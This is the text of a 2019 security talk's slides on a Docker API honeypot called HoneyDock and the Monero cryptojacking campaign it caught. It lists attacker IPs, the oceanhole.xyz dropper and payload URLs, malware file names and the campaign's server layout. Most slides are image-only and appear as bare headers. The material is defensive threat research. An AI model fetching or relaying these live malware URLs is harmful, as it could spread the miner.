Honeypot and Malware Hunting
Florian Charbonneau - HACK2G2
Whoami



Florian Charbonneau - HACK2G2
Overview
Florian Charbonneau - HACK2G2
- Honeypot
- Docker API
- HoneyDock
- Stats
- Malware Analysis
- Malware Infrastructure
- Campaign Evolution
Honeypot
Florian Charbonneau - HACK2G2

Honeypot
Florian Charbonneau - HACK2G2
Low interaction
Pros:
-
Easy to deploy
-
Service or system emulation
-
Easy to monitor
Cons:
-
Attacks are limited
-
Easily detectable
-
Restricted IOC
Honeypot
Florian Charbonneau - HACK2G2
High interaction
Pros:
-
Detection of advanced events and new exploits
-
Highly customizable
-
Difficult to detect by an attacker
-
Rich IOC
Cons:
-
Risky
-
Complex implementation
-
Need for an architecture
Honeypot
Florian Charbonneau - HACK2G2
De l'intérêt du Honeypot - Arnaud Zobec
Docker API
Florian Charbonneau - HACK2G2

Docker API
Florian Charbonneau - HACK2G2

Docker API
Florian Charbonneau - HACK2G2
Docker API
Florian Charbonneau - HACK2G2
HoneyDock
Florian Charbonneau - HACK2G2

HoneyDock
Florian Charbonneau - HACK2G2
- Python using Flask
- 40 lignes
-
Implemented endpoints
- _ping
- version
- info
- containers/json
- containers/create
- images/create
HoneyDock
Florian Charbonneau - HACK2G2

HoneyDock
Florian Charbonneau - HACK2G2

HoneyDock
Florian Charbonneau - HACK2G2
- Simple and fast to make
- Easily spoted
- Low interaction

HoneyDock
Florian Charbonneau - HACK2G2

Stats
2018 Nov 8 - 2019 Jan 24
(78 days)
Florian Charbonneau - HACK2G2

Stats
Florian Charbonneau - HACK2G2
- 14 000 requests by 165 IP
- ~1 request/min
- Images
- strm/xmrig
- bitnn/alpine-xmrig
- kannix/monero-miner
- arayan/monero-miner
- busybox
- alpine
- centos
- ubuntu
Stats
Florian Charbonneau - HACK2G2
- kannix/monero-miner : 10M
- bitnn/alpine-xmrig : 100k
- strm/xmrig : 50k
- arayan/monero-miner : 10k
Stats
Florian Charbonneau - HACK2G2
Malware Analysis
Florian Charbonneau - HACK2G2

Log Analysis
Florian Charbonneau - HACK2G2

Log Analysis
Florian Charbonneau - HACK2G2
- IP : 45.77.140.98
- DN : oceanhole.xyz
- Dropper : https://oceanhole.xyz/d
Dropper
Florian Charbonneau - HACK2G2

https://www.oceanhole.xyz/d
Environement Setup
Florian Charbonneau - HACK2G2

https://www.oceanhole.xyz/d3
Environment Setup
Florian Charbonneau - HACK2G2

https://www.oceanhole.xyz/d3
Environment Setup
Florian Charbonneau - HACK2G2

https://www.oceanhole.xyz/d3
Environment Setup
Florian Charbonneau - HACK2G2

https://www.oceanhole.xyz/d3
Environment Setup
Florian Charbonneau - HACK2G2
https://www.oceanhole.xyz/d3

Malware Analysis
Florian Charbonneau - HACK2G2
https://www.oceanhole.xyz/xg.n.tgz
- .cf
- b
- kernelupd
- xg
Malware Analysis
Florian Charbonneau - HACK2G2
https://www.oceanhole.xyz/xg.n.tgz#.cf

xmrigCC
Malware Analysis
Florian Charbonneau - HACK2G2
https://www.oceanhole.xyz/xg.n.tgz#b

Malware Analysis
Florian Charbonneau - HACK2G2
https://www.oceanhole.xyz/xg.n.tgz#kernelupd
Malware Infrastructure
Florian Charbonneau - HACK2G2

Florian Charbonneau - HACK2G2
Infrastructure
-
oceanhole.xyz
-
vpn.oceanhole.xyz
-
host.oceanhole.xyz
Florian Charbonneau - HACK2G2
oceanhole.xyz
- Domain Registered On 2018 Oct 03
- IP : 185.10.68.35
- Reverse DNS : 35.68.10.185.ro.ovo.sc (https://cock.li)
- DNS CNAME:
- wback.oceanhole.xyz
- ipv4.oceanhole.xyz
- www.oceanhole.xyz
Florian Charbonneau - HACK2G2
oceanhole.xyz
- 22 : SSH
- 80/443 : HTTP(S)
- 3344 : HTTPS (xmrCC Dashboard)
Florian Charbonneau - HACK2G2
oceanhole.xyz:443
- Malware distribution (Virus Total)
- Config files : Docker, SSH Key...
- XMR Miner (xmrigCC)
- Web Miner (crypto-loot.com)
Florian Charbonneau - HACK2G2
oceanhole.xyz:443

Florian Charbonneau - HACK2G2
oceanhole.xyz

Florian Charbonneau - HACK2G2
vpn.oceanhole.xyz
- IP : 45.77.140.98
- The attacking machine
- 22 : SSH
Florian Charbonneau - HACK2G2
vpn.oceanhole.xyz

Florian Charbonneau - HACK2G2
host.oceanhole.xyz
- IP : 104.238.190.35
- DNS CNAME : eu.proxy.oceanhole.xyz
Florian Charbonneau - HACK2G2
host.oceanhole.xyz
-
80 : xmr-node-proxy
-
40929 : SSH
Florian Charbonneau - HACK2G2
host.oceanhole.xyz

Florian Charbonneau - HACK2G2
Infrastructure

Florian Charbonneau - HACK2G2
Campaign Evolution
Florian Charbonneau - HACK2G2
Campaign Evolution
Florian Charbonneau - HACK2G2
Campaign Evolution
Florian Charbonneau - HACK2G2
Campaign Evolution
Florian Charbonneau - HACK2G2
Campaign Evolution
Florian Charbonneau - HACK2G2
Other Research
- https://blog.trendmicro.com/trendlabs-security-intelligence/misconfigured-container-abused-to-deliver-cryptocurrency-mining-malware
- https://www.fortinet.com/blog/threat-research/yet-another-crypto-mining-botnet.html
- https://blog.aquasec.com/cryptocurrency-miners-abusing-containers-anatomy-of-an-attempted-attack
Florian Charbonneau - HACK2G2
Tools
- Crt.sh
- Amass
- VirusTotal
- Urlscan.io
- Onyphe.io
- Shodan.io
Florian Charbonneau - HACK2G2
Thanks
Questions?

HACK2G2 | Honeypot and Malware Hunting
By Florian Charbonneau
HACK2G2 | Honeypot and Malware Hunting
Présentation 30/01/2019
- 58